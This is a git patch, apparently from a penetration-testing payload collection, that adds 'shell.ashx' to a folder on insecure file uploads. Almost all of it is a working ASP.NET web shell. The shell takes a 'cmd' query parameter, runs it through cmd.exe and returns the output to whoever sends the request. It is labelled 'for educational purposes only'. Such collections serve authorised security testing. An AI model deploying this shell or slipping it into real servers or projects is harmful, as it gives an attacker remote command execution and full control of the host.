From 2c0fff2a7a6d1e5ea31ecdd84756032f939a3754 Mon Sep 17 00:00:00 2001
From: chivato <61525295+SecGus@users.noreply.github.com>
Date: Tue, 30 Mar 2021 13:56:31 +0100
Subject: [PATCH] Add .ashx shell
---
.../Extension ASP/shell.ashx | 42 +++++++++++++++++++
1 file changed, 42 insertions(+)
create mode 100644 Upload Insecure Files/Extension ASP/shell.ashx
diff --git a/Upload Insecure Files/Extension ASP/shell.ashx b/Upload Insecure Files/Extension ASP/shell.ashx
new file mode 100644
index 00000000..bfd3286d
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.ashx
@@ -0,0 +1,42 @@
+<% @ webhandler language="C#" class="AverageHandler" %>
+
+using System;
+using System.Web;
+using System.Diagnostics;
+using System.IO;
+
+public class AverageHandler : IHttpHandler
+{
+ /* .Net requires this to be implemented */
+ public bool IsReusable
+ {
+ get { return true; }
+ }
+
+ /* main executing code */
+ public void ProcessRequest(HttpContext ctx)
+ {
+ Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
+ string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
+
+ ctx.Response.Write("");
+ ctx.Response.Write("
");
+ ctx.Response.Write("");
+
+ /* command execution and output retrieval */
+ ProcessStartInfo psi = new ProcessStartInfo();
+ psi.FileName = "cmd.exe";
+ psi.Arguments = "/c "+command;
+ psi.RedirectStandardOutput = true;
+ psi.UseShellExecute = false;
+ Process p = Process.Start(psi);
+ StreamReader stmrdr = p.StandardOutput;
+ string s = stmrdr.ReadToEnd();
+ stmrdr.Close();
+
+ ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
+ ctx.Response.Write("");
+ ctx.Response.Write("
");
+ ctx.Response.Write("By @Hypn, for educational purposes only.");
+ }
+}